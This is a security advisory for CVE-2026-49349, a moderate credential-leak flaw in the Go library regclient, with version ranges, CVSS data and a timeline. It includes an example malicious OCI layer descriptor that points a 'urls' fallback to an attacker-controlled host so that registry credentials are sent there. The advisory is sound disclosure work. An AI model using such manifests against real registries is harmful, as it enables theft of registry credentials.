GHSA-QVQC-4C52-X6QP

Vulnerability from github – Published: 2026-06-26 22:43 – Updated: 2026-06-26 22:43
VLAI
Summary
regclient may leak authentication credentials to external blob stores
Details

Credentials for a registry may be inadvertently leaked to external servers. A prerequisite for this attack is a malicious registry server, a malicious blob store, or a registry that does not restrict the external URLs for foreign blobs.

Example attack

A malicious registry serves an OCI image manifest containing a layer descriptor with a urls field pointing to an attacker controlled host:

{
  "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
  "digest": "sha256:...",
  "size": 1024,
  "urls": ["https://malicious.example.org/blobs/sha256/..."]
}

When regclient fetches the image and the primary blob request to the registry fails, it falls back to the URLs in the layer descriptor. If the external server requests authentication, regclient would send the credentials for the original registry server.

Timeline

  • 2026-05-25: Advisory submitted
  • 2026-05-26: Fix released

Credit

Theodoros Lampropoulos, Threat Detection Engineer, Odyssey Cyber Security

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.11.4"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/regclient/regclient"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.11.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-49349"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-522"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-26T22:43:31Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "Credentials for a registry may be inadvertently leaked to external servers. A prerequisite for this attack is a malicious registry server, a malicious blob store, or a registry that does not restrict the external URLs for foreign blobs.\n\n## Example attack\n\nA malicious registry serves an OCI image manifest containing a layer descriptor with a `urls` field pointing to an attacker controlled host:\n\n```json\n{\n  \"mediaType\": \"application/vnd.oci.image.layer.v1.tar+gzip\",\n  \"digest\": \"sha256:...\",\n  \"size\": 1024,\n  \"urls\": [\"https://malicious.example.org/blobs/sha256/...\"]\n}\n```\n\nWhen regclient fetches the image and the primary blob request to the registry fails, it falls back to the URLs in the layer descriptor. If the external server requests authentication, regclient would send the credentials for the original registry server.\n\n## Timeline\n\n- 2026-05-25: Advisory submitted\n- 2026-05-26: Fix released\n\n## Credit\n\nTheodoros Lampropoulos, Threat Detection Engineer, Odyssey Cyber Security",
  "id": "GHSA-qvqc-4c52-x6qp",
  "modified": "2026-06-26T22:43:31Z",
  "published": "2026-06-26T22:43:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/regclient/regclient/security/advisories/GHSA-qvqc-4c52-x6qp"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/regclient/regclient"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "regclient may leak authentication credentials to external blob stores"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…